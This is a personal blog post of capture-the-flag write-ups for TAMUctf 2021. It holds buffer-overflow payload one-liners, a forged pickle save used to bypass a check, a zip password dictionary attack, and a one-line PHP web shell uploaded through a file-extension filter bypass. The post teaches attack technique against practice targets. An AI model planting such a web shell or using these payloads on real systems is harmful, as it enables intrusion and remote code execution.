<!DOCTYPE html>
<html lang="en">

<head>
    
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
<meta name="HandheldFriendly" content="True" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
<meta name="generator" content="Hugo 0.87.0" />





<title>TAMUctf 2021 - Jonathan Saenz Blog</title>


<meta name="author" content="Jonathan Saenz" />


<meta name="description" content="Jonathan Saenz Blog" />


<meta name="keywords" content="Writeups" />

<meta property="og:title" content="TAMUctf 2021" />
<meta property="og:description" content="TAMUctf 2021 I competed individually in TAMUctf 2021 which ran from April 22nd-25th. I finished the competition with 11/35 solves, 1150 points, placing 5th in the Texas A&amp;M University bracket, and 65th overall in the global bracket with around 350 competitors/teams that submitted a flag." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://blog.jonathanfsaenz.com/post/tamuctf-2021/" /><meta property="og:image" content="https://blog.jonathanfsaenz.com/img/og.png"/><meta property="article:section" content="post" />
<meta property="article:published_time" content="2021-04-26T00:00:00+00:00" />
<meta property="article:modified_time" content="2021-04-26T00:00:00+00:00" />


<meta name="twitter:card" content="summary_large_image"/>
<meta name="twitter:image" content="https://blog.jonathanfsaenz.com/img/og.png"/>

<meta name="twitter:title" content="TAMUctf 2021"/>
<meta name="twitter:description" content="TAMUctf 2021 I competed individually in TAMUctf 2021 which ran from April 22nd-25th. I finished the competition with 11/35 solves, 1150 points, placing 5th in the Texas A&amp;M University bracket, and 65th overall in the global bracket with around 350 competitors/teams that submitted a flag."/>



<style>
    @media (prefers-color-scheme: dark) {
        body[data-theme='auto'] img {
            filter: brightness(60%);
        }
    }

    body[data-theme='dark'] img {
        filter: brightness(60%);
    }
</style>



<link rel="stylesheet" href="https://blog.jonathanfsaenz.com/assets/css/fuji.min.css" />





</head>

<body data-theme="auto">
    <script data-cfasync="false">
  
  var fujiThemeData = localStorage.getItem('fuji_data-theme');
  
  if (!fujiThemeData) {
    localStorage.setItem('fuji_data-theme', 'auto');
  } else {
    
    if (fujiThemeData !== 'auto') {
      document.body.setAttribute('data-theme', fujiThemeData === 'dark' ? 'dark' : 'light');
    }
  }
</script>

    <header>
    <div class="container-lg clearfix">
        <div class="col-12 header">
            <a class="title-main" href="https://blog.jonathanfsaenz.com/">Jonathan Saenz Blog</a>
            
            <span class="title-sub">Blog about technology, my personal growth, and interests</span>
            
        </div>
    </div>
</header>

    <main>
        <div class="container-lg clearfix">
            
            <div class="col-12 col-md-9 float-left content">
                
<article>
    
    <h2 class="post-item post-title">
        <a href="https://blog.jonathanfsaenz.com/post/tamuctf-2021/">TAMUctf 2021</a>
    </h2>
    <div class="post-item post-meta">
        <span><i class="iconfont icon-today-sharp"></i>&nbsp;04-26-2021</span>



<span><i class="iconfont icon-pricetags-sharp"></i>&nbsp;<a href="/tags/writeups">Writeups</a>&nbsp;</span>
    </div>
    
    
    <div class="post-content markdown-body">
        <h1 id="tamuctf-2021">TAMUctf 2021</h1>
<p>I competed individually in TAMUctf 2021 which ran from April 22nd-25th. I finished the competition with 11/35 solves, 1150 points, placing 5th in the Texas A&amp;M University bracket, and 65th overall in the global bracket with around 350 competitors/teams that submitted a flag. I was 50 points away from 6th place and 1500 points away from first place for the Texas A&amp;M bracket.</p>
<p>The writeups below are for the challenges I solved. Fair warning, I am not a seasoned CTF player or compete regularly so my writeups will most likely not be the optimal solution.</p>
<h1 id="table-of-contents">Table of Contents</h1>
<ul>
<li><a href="#osint">OSINT</a>
<ul>
<li><a href="#archival">Archival - Points: 50</a></li>
<li><a href="#eliz-missing">Elizabeth is Missing - Points: 100</a></li>
</ul>
</li>
<li><a href="#rev">Reverse Engineering</a>
<ul>
<li><a href="#acrylic">Acrylic - Points: 100</a></li>
</ul>
</li>
<li><a href="#crypto">Crypto</a>
<ul>
<li><a href="#encoding">Encoding - Points: 100</a></li>
<li><a href="#rsa">Basic RSA - Points: 100</a></li>
</ul>
</li>
<li><a href="#forensics">Forensics</a>
<ul>
<li><a href="#unzip">Unzip - Points: 100</a></li>
</ul>
</li>
<li><a href="#sigint">Sigint</a>
<ul>
<li><a href="#spectral-img">Spectral Imaging - Points: 100</a></li>
</ul>
</li>
<li><a href="#pwn">PWN</a>
<ul>
<li><a href="#pancake">Pancake - Points: 100</a></li>
<li><a href="#handshake">Handshake - Points: 150</a></li>
<li><a href="#handshake">TicTacToe - Points: 150</a></li>
</ul>
</li>
<li><a href="#web">Web</a>
<ul>
<li><a href="#uphpload">uphpload - Points: 100</a></li>
</ul>
</li>
</ul>
<h1 id="osint">OSINT</h1>
<h2 id="archival---points-50-a-namearchivala">Archival - Points: 50 <a name="archival"></a></h2>
<blockquote>
<p>I can&rsquo;t remember the flag&hellip; it used to be on our website but when we updated it the flag got lost in the process. Since nothing ever gets deleted on the internet it should be safe, but how?</p>
</blockquote>
<p>We were asked to retrieve the flag from the previous version of the <a href="http://tamuct.com" target="_blank">t</a>amuctf.com home page.</p>
<p>We can use Wayback Machine to see the previous version of the home page and retrieve the flag since it archives previous versions of a website that have been captured.</p>
<p><a href="https://web.archive.org/web/20201028142907/https://tamuctf.com/" target="_blank">https://web.archive.org/web/20201028142907/https://tamuctf.com/</a></p>
<p><img class="img-zoomable" src="/writeups/TAMUctf-2021/Untitled.png" alt="TAMUctf-2021/Untitled.png" />
</p>
<p><strong>flag:</strong> <code>gigem{s1t3_und3r_c0n57ruc710n}</code></p>
<h2 id="elizabeth-is-missing---points-100-a-nameeliz-missinga">Elizabeth is Missing - Points: 100 <a name="eliz-missing"></a></h2>
<blockquote>
<p>Friends have reported Elizabeth missing and need your help locating her!
Can you follow the clues in the missing person flyer and find her most recent location?</p>
</blockquote>
<p>file: <a href="/writeups/TAMUctf-2021/eowens-flyer.pdf">eowens-flyer.pdf</a></p>
<p>When we open the PDF, there is a section indicating that it needs to be decrypted.</p>
<p><img class="img-zoomable" src="/writeups/TAMUctf-2021/Untitled%201.png" alt="TAMUctf-2021/Untitled%201.png" />
</p>
<p>We can use a decimal to ASCII converter to get the decoded message.</p>
<p><a href="https://www.rapidtables.com/convert/number/ascii-hex-bin-dec-converter.html" target="_blank">https://www.rapidtables.com/convert/number/ascii-hex-bin-dec-converter.html</a></p>
<p><img class="img-zoomable" src="/writeups/TAMUctf-2021/Untitled%202.png" alt="TAMUctf-2021/Untitled%202.png" />
</p>
<p>When we call (979)-429-2176, we get sent straight to Elizabeth&rsquo;s voicemail indicating she is on a retreat and mentions to keep up with her on her website. <a href="https://eowensphotography.weebly.com/" target="_blank">https://eowensphotography.weebly.com/</a></p>
<p>After visiting her site, we can use the web browser&rsquo;s search feature and search for &ldquo;gigem&rdquo; to retrieve the flag on the home page</p>
<p><img class="img-zoomable" src="/writeups/TAMUctf-2021/Untitled%203.png" alt="TAMUctf-2021/Untitled%203.png" />
</p>
<p><strong>flag:</strong> <code>gigem{3_0W3N5}</code></p>
<h1 id="reverse-engineering-a-namereva">Reverse Engineering <a name="rev"></a></h1>
<h2 id="acrylic---points-100-a-nameacrylica">Acrylic - Points: 100 <a name="acrylic"></a></h2>
<blockquote>
<p>This is an easy challenge. There is a flag that can be printed out from somewhere in this binary. Only one problem: There&rsquo;s a lot of fake flags as well.</p>
</blockquote>
<p>file: <a href="/writeups/TAMUctf-2021/acrylic.bin">acrylic</a></p>
<pre><code class="language-php">&gt; file acrylic.bin
acrylic.bin: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=a74dd043e900423b933455a724cf69c7e4840b28, not stripped
</code></pre>
<p>Loaded the binary in Ghidra and relabeled the get_flag function variables for easier readability.</p>
<p><img class="img-zoomable" src="/writeups/TAMUctf-2021/Untitled%204.png" alt="TAMUctf-2021/Untitled%204.png" />
</p>
<p>Ran the get_flag code in a separate terminal to get the final value of <code>a</code> which is 88.</p>
<p><img class="img-zoomable" src="/writeups/TAMUctf-2021/Untitled%205.png" alt="TAMUctf-2021/Untitled%205.png" />
</p>
<p>We need to find the return address of the <code>get_flag</code> function so we needed to compute <code>flags + (long)a * 0x40</code>return value.</p>
<p>If we look in Ghidra, we can see the start address of the flags variable is <code>0x301020</code>.</p>
<p><img class="img-zoomable" src="/writeups/TAMUctf-2021/Untitled%206.png" alt="TAMUctf-2021/Untitled%206.png" />
</p>
<p>We can now compute the return address of the get_flag function.</p>
<p><code>a * 0x40 = a * 64 = 88*64 = 5632 = 0x1600</code></p>
<p><code>flags + (long)a * 0x40 = 0x301020 + 0x1600 = 0x302620</code></p>
<p>Therefore, we need to find the string at memory address <code>0x302620</code></p>
<p>We can use the search→strings feature in Ghidra to find the specific address.</p>
<p><img class="img-zoomable" src="/writeups/TAMUctf-2021/Untitled%207.png" alt="TAMUctf-2021/Untitled%207.png" />
</p>
<p><strong>flag:</strong> <code>gigem{counteradvise_orbitoides}</code></p>
<h1 id="crypto">Crypto</h1>
<h2 id="encoding---points-100-a-nameencodinga">Encoding - Points: 100 <a name="encoding"></a></h2>
<blockquote>
<p>This is literally the flag but obfuscated through tons of different encoding schemes.</p>
</blockquote>
<p>file: <a href="/writeups/TAMUctf-2021/data-encoding.txt">data.txt</a></p>
<p>We can use CyberChef magic function to analyze the data given to us.</p>
<p>When we analyze the data given in small chunks, we can see that it was encoded with octal encoding.</p>
<p><img class="img-zoomable" src="/writeups/TAMUctf-2021/Untitled%208.png" alt="TAMUctf-2021/Untitled%208.png" />
</p>
<p>When we add more data, we can see that it was encoded with octal and hex and is decoded  in binary format.</p>
<p><img class="img-zoomable" src="/writeups/TAMUctf-2021/Untitled%209.png" alt="TAMUctf-2021/Untitled%209.png" />
</p>
<p>When we combine octal, hex, and binary decoding, we are able to get a string that looks like base64 encoding.</p>
<p><img class="img-zoomable" src="/writeups/TAMUctf-2021/Untitled%2010.png" alt="TAMUctf-2021/Untitled%2010.png" />
</p>
<p>We can analyze the previous string and see that it was first encoded with base64 then base32.</p>
<p><img class="img-zoomable" src="/writeups/TAMUctf-2021/Untitled%2011.png" alt="TAMUctf-2021/Untitled%2011.png" />
</p>
<p>Encoding scheme: base64→base32→binary→hex→octal</p>
<p><strong>flag:</strong> <code>gigem{3nc0ding_1s_n0t_crypt0_428427}</code></p>
<h2 id="basic-rsa---points-100-a-namersaa">Basic RSA - Points: 100 <a name="rsa"></a></h2>
<blockquote>
<p>To: Dr Rivest
CC: Dr Shamir
We found this code and these numbers. data.txt
Mean anything to you?
Sincerely</p>
</blockquote>
<ul>
<li>Dr Adleman</li>
</ul>
<p>file: <a href="/writeups/TAMUctf-2021/data.txt">data.txt</a></p>
<p>We were given the public key <code>e</code>, modulus <code>N</code>, and a list of cipher text <code>c</code></p>
<p>We can compute the private key with <code>d = e^-1 mod phi</code></p>
<p>We can find the prime factorization of N by using <a href="http://factordb.com" target="_blank">factordb.com</a></p>
<p><img class="img-zoomable" src="/writeups/TAMUctf-2021/Untitled%2012.png" alt="TAMUctf-2021/Untitled%2012.png" />
</p>
<pre><code class="language-python">from Crypto.Util.number import inverse

N = 2095975199372471 
e = 5449
p = 21094081 
q = 99363191

c = [875597732337885,1079270043421597,616489707580218,2010079518477891,1620280754358135,616660320758264,86492804386481,171830236437002,1500250422231406,234060757406619,1461569132566245,897825842938043,2010079518477891,234060757406619,1620280754358135,2010079518477891,966944159095310,1669094464917286,1532683993596672,171830236437002,1461569132566245,2010079518477891,221195854354967,1500250422231406,234060757406619,355168739080744,616660320758264,1620280754358135]

phi = (p - 1) * (q - 1)

d = inverse(e, phi)

flag = &quot;&quot;

for c2m in c:
        m = pow(c2m, d, N)
        flag += bytearray.fromhex(hex(m)[2:]).decode()

print(&quot;gigem{%s}&quot; % flag)
</code></pre>
<p><strong>flag:</strong> <code>gigem{RSA_s3cur1ty_1s_4b0ut_pr1m3s}</code></p>
<h1 id="forensics">Forensics</h1>
<h2 id="unzip---points-100-a-nameunzipa">Unzip - Points: 100 <a name="unzip"></a></h2>
<blockquote>
<p>Hey, can you unzip this for me?</p>
</blockquote>
<p><a href="/writeups/TAMUctf-2021/chall.zip">chall.zip</a></p>
<p>We are given a zip file that is password protected. We can run the zip file against fcrackzip tool with a dictionary attack enabled to find the correct password.</p>
<pre><code class="language-bash">&gt; fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt chall.zip
</code></pre>
<p><img class="img-zoomable" src="/writeups/TAMUctf-2021/Untitled%2013.png" alt="TAMUctf-2021/Untitled%2013.png" />
</p>
<p>password: <code>hunter2</code></p>
<p>We can unzip the zip file with the password we found to get the file that contains the flag.</p>
<p><img class="img-zoomable" src="/writeups/TAMUctf-2021/Untitled%2014.png" alt="TAMUctf-2021/Untitled%2014.png" />
</p>
<p><strong>flag:</strong> <code>gigem{d0esnt_looK_lik3_5t4rs_t0_M3}</code></p>
<h1 id="sigint">Sigint</h1>
<h2 id="spectral-imaging---points-100-a-namespectral-imga">Spectral Imaging - Points: 100 <a name="spectral-img"></a></h2>
<blockquote>
<p>Some things are meant to be heard but not seen. This sounds like it&rsquo;s meant to be seen, not heard.</p>
</blockquote>
<p><a href="/writeups/TAMUctf-2021/audio.wav">audio.wav</a></p>
<p>We can run the audio file through a spectral analyzer to visualize the audio signals.</p>
<p>Using the following tool will show the flag below. <a href="https://www.dcode.fr/spectral-analysis" target="_blank">https://www.dcode.fr/spectral-analysis</a></p>
<p><img class="img-zoomable" src="/writeups/TAMUctf-2021/Untitled%2015.png" alt="TAMUctf-2021/Untitled%2015.png" />
</p>
<p><strong>flag:</strong> <code>gigem{4ud10-m4d3-v15u4L}</code></p>
<h1 id="pwn">PWN</h1>
<h2 id="pancake---points-100-a-namepancakea">Pancake - Points: 100 <a name="pancake"></a></h2>
<blockquote>
<p>Attack this binary to get the flag!</p>
</blockquote>
<p><a href="/writeups/TAMUctf-2021/pancake.txt">pancake</a></p>
<pre><code class="language-bash">&gt; file ./pancake
./pancake: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=f6216b4f441f42a2260220682ead74b9f61bc162, for GNU/Linux 3.2.0, not stripped
</code></pre>
<p><img class="img-zoomable" src="/writeups/TAMUctf-2021/Untitled%2016.png" alt="TAMUctf-2021/Untitled%2016.png" />
</p>
<p><img class="img-zoomable" src="/writeups/TAMUctf-2021/Untitled%2017.png" alt="TAMUctf-2021/Untitled%2017.png" />
</p>
<p>This binary appears to be vulnerable to buffer overflow since memory has been overwritten with our input.</p>
<p>Let&rsquo;s now analyze this file with Ghidra to see the decompiled code.</p>
<p><img class="img-zoomable" src="/writeups/TAMUctf-2021/Untitled%2018.png" alt="TAMUctf-2021/Untitled%2018.png" />
</p>
<p>We can notice that there is a comparison to <code>0x8406688</code> with a variable that has been initialized to zero.</p>
<p>We can write to the memory address of the variable that gets compared to <code>0x8406688</code> with the correct value to validate the comparison with the following command</p>
<pre><code class="language-python">&gt; python -c &quot;print('A'*67 + '\x88f@\x08')&quot; | ./pancake
</code></pre>
<p><strong>flag:</strong> <code>gigem{b4s1c_b4ff3r_0verfl0w_g03s_y33t}</code></p>
<h2 id="handshake---points-150-a-namehandshakea">Handshake - Points: 150 <a name="handshake"></a></h2>
<blockquote>
<p>Attack this binary and get the flag!</p>
</blockquote>
<p><a href="/writeups/TAMUctf-2021/handshake.bin">handshake.bin</a></p>
<pre><code class="language-python">&gt; file handshake
handshake: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=4095e5911cf4d421e08cfe6cb9010d029426e836, for GNU/Linux 3.2.0, not stripped
</code></pre>
<p>In this challenge, we just need to call a function that is not being called. There is a <code>win</code> function that we can identify if we run <code>readelf -s hankshake</code> .</p>
<pre><code class="language-bash">&gt; readelf -s handshake | grep win
62: 080491c2   222 FUNC    GLOBAL DEFAULT   13 win
</code></pre>
<p>We need to convert address <code>0x080491c2</code>to 32-bit little endian and add it to over buffer overflow attack.</p>
<pre><code class="language-python">import pwn
print(pwn.p32(0x080491c2, endian='little'))
b'\xc2\x91\x04\x08'
</code></pre>
<p>We have to set the address stored in the instruction pointer to the address of the win function so it gets executed on the next instruction. We can find that the buffer size is 42 bytes before the program segfaults and append the address of the win function for the function to be called. I used <code>sudo dmesg | grep segfault</code> to check the instruction pointer and by how much it was overwritten when the program segfaults with arbitrary input lengths until I found the size that was just big enough to overwrite the address stored in the instruction pointer.</p>
<pre><code class="language-python">&gt; python -c &quot;print('A'*42 + '\xc2\x91\x04\x08')&quot; | ./hankshake
</code></pre>
<p><strong>flag:</strong> <code>gigem{r37urn_c0n7r0l1337}</code></p>
<h2 id="tictactoe---points-150-a-nametictactoea">TicTacToe - Points: 150 <a name="TicTacToe"></a></h2>
<p><a href="/writeups/TAMUctf-2021/tictactoe.py">tictactoe.py</a></p>
<p>We are given a python file that runs a Tic-Tac-Toe game. After analyzing it, we can notice that this program is vulnerable to python pickle serialization.</p>
<p><a href="https://dan.lousqui.fr/explaining-and-exploiting-deserialization-vulnerability-with-python-en.html" target="_blank">https://dan.lousqui.fr/explaining-and-exploiting-deserialization-vulnerability-with-python-en.html</a></p>
<p>When we look at the source code, we can notice that the <code>get_hash</code> function is not using the arguments that are being passed in so we can bypass the validation check when using option 4 in the program. Let&rsquo;s create our own &ldquo;code&rdquo; that saves our progress with the hash of 0 wins but modify the number of wins to be greater or equal to the target number of wins which is 133713371337.</p>
<pre><code class="language-python">import pickle
import base64

data = {'wins': 133713371337, 'security': 'JmWnJJI4Wf0Tofe8nEjIBP+l9ceVBhgDEYdUCHAdOOE='}

print(base64.b64encode(pickle.dumps(data)).decode())
'gASVTQAAAAAAAAB9lCiMBHdpbnOUigXJIPAhH4wIc2VjdXJpdHmUjCxKbVduSkpJNFdmMFRvZmU4bkVqSUJQK2w5Y2VWQmhnREVZZFVDSEFkT09FPZR1Lg=='
</code></pre>
<p>Serialized <code>data</code> variable: <code>gASVTQAAAAAAAAB9lCiMBHdpbnOUigXJIPAhH4wIc2VjdXJpdHmUjCxKbVduSkpJNFdmMFRvZmU4bkVqSUJQK2w5Y2VWQmhnREVZZFVDSEFkT09FPZR1Lg==</code></p>
<p>After using the modified serialized input, the program deserializes it with the pickle load command and we are able to make the program believe we achieve the desired win score to retrieve the flag.</p>
<p><img class="img-zoomable" src="/writeups/TAMUctf-2021/Untitled%2019.png" alt="TAMUctf-2021/Untitled%2019.png" />
</p>
<p><strong>flag:</strong> <code>gigem{h3y_7h47_d035n'7_l00k_l1k3_4_p1ckl3d_54v3}</code></p>
<h1 id="web">Web</h1>
<h2 id="uphpload---points-100-a-nameuphploada">uphpload - Points: 100 <a name="uphpload"></a></h2>
<blockquote>
<p>I made a website to collect reaction images, feel free to upload some!</p>
</blockquote>
<p>When we access the web page, we notice that it allows file uploads but after trying to upload a PHP file, we get a message specifying only jpg, gif, png, and jpeg file types are allowed.</p>
<p>We need to find a way to bypass the filter and the link below provides some useful techniques to do so.</p>
<p><a href="https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf" target="_blank">https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf</a></p>
<p><img class="img-zoomable" src="/writeups/TAMUctf-2021/Untitled%2020.png" alt="TAMUctf-2021/Untitled%2020.png" />
</p>
<p>We can create a <code>uphpload.jpg.php</code> file to bypass the file extension filter and insert the following content to exploit RCE vulnerability on the web application.</p>
<pre><code class="language-php">&lt;?php echo shell_exec($_GET['cmd']); ?&gt;
</code></pre>
<p>We can confirm we have RCE on the web app by issuing a simple <code>whoami</code> command.</p>
<p><img class="img-zoomable" src="/writeups/TAMUctf-2021/Untitled%2021.png" alt="TAMUctf-2021/Untitled%2021.png" />
</p>
<p>We can now do a directory traversal attack to find the flag.</p>
<p><img class="img-zoomable" src="/writeups/TAMUctf-2021/Untitled%2022.png" alt="TAMUctf-2021/Untitled%2022.png" />
</p>
<p><img class="img-zoomable" src="/writeups/TAMUctf-2021/Untitled%2023.png" alt="TAMUctf-2021/Untitled%2023.png" />
</p>
<p><strong>flag:</strong> <code>gigem{R3vER5e_R3ver5e!}</code></p>

    </div>
</article>




            </div>
            <aside class="col-12 col-md-3 float-left sidebar">
    
    <div class="sidebar-item sidebar-pages">
        <h3>Pages</h3>
        <ul>
            
            <li>
                <a href="/">Home</a>
            </li>
            
        </ul>
    </div>
    
    <div class="sidebar-item sidebar-links">
        <h3>Links</h3>
        <ul>
            
            <li>
                <a href="https://www.linkedin.com/in/jsaenz1/" target="_blank"><span>LinkedIn</span></a>
            </li>
            
            <li>
                <a href="https://github.com/saenzjonathan11/" target="_blank"><span>GitHub</span></a>
            </li>
            
            <li>
                <a href="https://jonathanfsaenz.com/" target="_blank"><span>Personal Site</span></a>
            </li>
            
        </ul>
    </div>
    
    <div class="sidebar-item sidebar-tags">
        <h3>Tags</h3>
        <div>
            
            <span>
                <a href="/tags/certifications/">Certifications</a>
            </span>
            
            <span>
                <a href="/tags/linux/">Linux</a>
            </span>
            
            <span>
                <a href="/tags/writeups/">Writeups</a>
            </span>
            
        </div>
    </div>
    
</aside>
        </div>
        <div class="btn">
    <div class="btn-menu" id="btn-menu">
        <i class="iconfont icon-grid-sharp"></i>
    </div>
    <div class="btn-toggle-mode">
        <i class="iconfont icon-contrast-sharp"></i>
    </div>
    <div class="btn-scroll-top">
        <i class="iconfont icon-chevron-up-circle-sharp"></i>
    </div>
</div>
<aside class="sidebar-mobile" style="display: none;">
  <div class="sidebar-wrapper">
    
    <div class="sidebar-item sidebar-pages">
        <h3>Pages</h3>
        <ul>
            
            <li>
                <a href="/">Home</a>
            </li>
            
        </ul>
    </div>
    
    <div class="sidebar-item sidebar-links">
        <h3>Links</h3>
        <ul>
            
            <li>
                <a href="https://www.linkedin.com/in/jsaenz1/" target="_blank"><span>LinkedIn</span></a>
            </li>
            
            <li>
                <a href="https://github.com/saenzjonathan11/" target="_blank"><span>GitHub</span></a>
            </li>
            
            <li>
                <a href="https://jonathanfsaenz.com/" target="_blank"><span>Personal Site</span></a>
            </li>
            
        </ul>
    </div>
    
    <div class="sidebar-item sidebar-tags">
        <h3>Tags</h3>
        <div>
            
            <span>
                <a href="/tags/certifications/">Certifications</a>
            </span>
            
            <span>
                <a href="/tags/linux/">Linux</a>
            </span>
            
            <span>
                <a href="/tags/writeups/">Writeups</a>
            </span>
            
        </div>
    </div>
    
    
    
    
  </div>
</aside>
    </main>

    <footer>
    <div class="container-lg clearfix">
        <div class="col-12 footer">
            
            <span>&copy; 2021
                <a href="https://blog.jonathanfsaenz.com/">Jonathan Saenz</a>
                
                | Powered by <a href="https://github.com/amzrk2/hugo-theme-fuji/"
                   target="_blank">Fuji-v2</a> &amp; <a href="https://gohugo.io/"
                                                    target="_blank">Hugo</a> 
            </span>
        </div>
    </div>
</footer>

    
<script defer src="https://cdn.jsdelivr.net/combine/npm/medium-zoom@1.0.6,npm/lazysizes@5.2.2"></script>
<script defer src="https://cdn.jsdelivr.net/npm/prismjs@1.21.0/components/prism-core.min.js"></script>
<script defer src="https://cdn.jsdelivr.net/npm/prismjs@1.21.0/plugins/autoloader/prism-autoloader.min.js"></script>



<script defer src="/assets/js/fuji.min.js"></script>


</body>

</html>